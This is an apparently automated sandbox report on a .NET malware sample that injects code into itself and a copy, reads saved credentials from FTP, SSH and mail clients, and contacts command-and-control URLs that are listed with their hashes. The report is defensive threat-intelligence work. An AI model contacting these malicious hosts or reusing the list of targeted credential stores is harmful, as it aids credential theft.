Source: C:\Users\user\Desktop\gunzipped.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Memory written: C:\Users\user\Desktop\gunzipped.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory written: C:\Users\user\AppData\Roaming\WiHDtnb.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Users\user\AppData\Roaming\WiHDtnb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Windows Analysis Report gunzipped.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
gunzipped.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: PopPassword		12_2_0040D069
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: SmtpPassword		12_2_0040D069

Name	Malicious	Antivirus Detection	Reputation
http://136.244.109.75/index.php/1748937	true		unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

ID:	1427123
Product:	CloudBasic
Start time:	03:16:05
Start date:	17.04.2024
Sample:	gunzipped.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8864b52d242037414b7c4a230c390ab8
SHA1:	47680d0f0d286097f7cdda37947aaaacd7226ee3
SHA256:	d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WiHDtnb.exe.log	ASCII text, with CRLF line terminators	97AD91F1C1F572C945DA12233082171D	D5E33DDAB37E32E416FC40419FB26B3C0563519D	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gunzipped.exe.log	ASCII text, with CRLF line terminators	97AD91F1C1F572C945DA12233082171D	D5E33DDAB37E32E416FC40419FB26B3C0563519D	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	D83AFE19E5D73A16F6E64349291CFDE7	F00A166D5E19F565A79DA8AAF60BFAD6424FB119	E0617D49B7E5704732939767B06CFB7B75FE4AF5EBC37B0197E3D1555BCFDE86
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4saqt0i.zdl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx3xeap1.mbz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1rg5cf2.b3l.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe1tyowq.3ch.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp	XML 1.0 document, ASCII text	510F1589129C1F420D0A3370D577A0B5	5A2C71387F6BD3829FDD94BE87AEF9835C43ED36	2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp	XML 1.0 document, ASCII text	510F1589129C1F420D0A3370D577A0B5	5A2C71387F6BD3829FDD94BE87AEF9835C43ED36	2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
C:\Users\user\AppData\Roaming\188E93\31437F.lck	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06	data	DAB633BEBCCE13575989DCFA4E2203D6	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
C:\Users\user\AppData\Roaming\WiHDtnb.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8864B52D242037414B7C4A230C390AB8	47680D0F0D286097F7CDDA37947AAAACD7226EE3	D405284F75CDE4B8C45E3D5C3B41C7BBD6DB2C75788CB6D0B1DEEC5EA60559A4
C:\Users\user\AppData\Roaming\WiHDtnb.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309